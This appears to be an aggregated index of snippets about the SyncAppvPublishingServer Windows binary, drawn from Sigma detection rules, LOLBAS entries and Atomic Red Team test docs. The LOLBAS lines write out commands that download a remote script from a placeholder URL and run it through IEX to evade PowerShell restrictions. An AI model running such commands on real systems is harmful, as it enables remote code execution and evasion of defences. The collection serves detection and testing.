sigma |
powershell_syncappvpublishingserver_exe.yml |
title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction |
DRL 1.0 |
sigma |
powershell_syncappvpublishingserver_exe.yml |
description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. |
DRL 1.0 |
sigma |
powershell_syncappvpublishingserver_exe.yml |
- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ |
DRL 1.0 |
sigma |
powershell_syncappvpublishingserver_exe.yml |
- 'SyncAppvPublishingServer.exe' |
DRL 1.0 |
sigma |
process_creation_syncappvpublishingserver_exe.yml |
title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction |
DRL 1.0 |
sigma |
process_creation_syncappvpublishingserver_exe.yml |
description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. |
DRL 1.0 |
sigma |
process_creation_syncappvpublishingserver_exe.yml |
- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ |
DRL 1.0 |
sigma |
process_creation_syncappvpublishingserver_exe.yml |
Image\|endswith: '\SyncAppvPublishingServer.exe' |
DRL 1.0 |
sigma |
image_load_in_memory_powershell.yml |
- '\syncappvpublishingserver.exe' |
DRL 1.0 |
sigma |
posh_pm_syncappvpublishingserver_exe.yml |
title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction |
DRL 1.0 |
sigma |
posh_pm_syncappvpublishingserver_exe.yml |
description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. |
DRL 1.0 |
sigma |
posh_pm_syncappvpublishingserver_exe.yml |
- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ |
DRL 1.0 |
sigma |
posh_pm_syncappvpublishingserver_exe.yml |
ContextInfo\|contains: 'SyncAppvPublishingServer.exe' |
DRL 1.0 |
sigma |
posh_ps_syncappvpublishingserver_exe.yml |
title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction |
DRL 1.0 |
sigma |
posh_ps_syncappvpublishingserver_exe.yml |
description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. |
DRL 1.0 |
sigma |
posh_ps_syncappvpublishingserver_exe.yml |
- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ |
DRL 1.0 |
sigma |
posh_ps_syncappvpublishingserver_exe.yml |
ScriptBlockText\|contains: 'SyncAppvPublishingServer.exe' |
DRL 1.0 |
sigma |
proc_creation_win_syncappvpublishingserver_execute_powershell.yml |
title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code |
DRL 1.0 |
sigma |
proc_creation_win_syncappvpublishingserver_execute_powershell.yml |
description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. |
DRL 1.0 |
sigma |
proc_creation_win_syncappvpublishingserver_execute_powershell.yml |
- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ |
DRL 1.0 |
sigma |
proc_creation_win_syncappvpublishingserver_execute_powershell.yml |
Image\|endswith: '\SyncAppvPublishingServer.exe' |
DRL 1.0 |
sigma |
proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml |
title: SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code |
DRL 1.0 |
sigma |
proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml |
description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs |
DRL 1.0 |
sigma |
proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml |
- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ |
DRL 1.0 |
sigma |
proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml |
- '\SyncAppvPublishingServer.vbs' |
DRL 1.0 |
LOLBAS |
Syncappvpublishingserver.yml |
Name: SyncAppvPublishingServer.exe |
|
LOLBAS |
Syncappvpublishingserver.yml |
- Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') \| IEX" |
|
LOLBAS |
Syncappvpublishingserver.yml |
Usecase: Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures |
|
LOLBAS |
Syncappvpublishingserver.yml |
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe |
|
LOLBAS |
Syncappvpublishingserver.yml |
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe |
|
LOLBAS |
Syncappvpublishingserver.yml |
- IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed |
|
LOLBAS |
Syncappvpublishingserver.yml |
Name: Syncappvpublishingserver.vbs |
|
LOLBAS |
Syncappvpublishingserver.yml |
- Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') \| IEX" |
|
LOLBAS |
Syncappvpublishingserver.yml |
- Path: C:\Windows\System32\SyncAppvPublishingServer.vbs |
|
atomic-red-team |
index.md |
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows] |
MIT License. © 2018 Red Canary |
atomic-red-team |
index.md |
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows] |
MIT License. © 2018 Red Canary |
atomic-red-team |
windows-index.md |
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows] |
MIT License. © 2018 Red Canary |
atomic-red-team |
windows-index.md |
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows] |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1216.md |
- Atomic Test #1 - SyncAppvPublishingServer Signed Script PowerShell Command Execution |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1216.md |
## Atomic Test #1 - SyncAppvPublishingServer Signed Script PowerShell Command Execution |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1216.md |
Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1216.md |
C:\windows\system32\SyncAppvPublishingServer.vbs “\n;#{command_to_execute}” |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.md |
- Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.md |
## Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.md |
Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. |
MIT License. © 2018 Red Canary |
atomic-red-team |
T1218.md |
SyncAppvPublishingServer.exe “n; #{powershell_code}” |
MIT License. © 2018 Red Canary |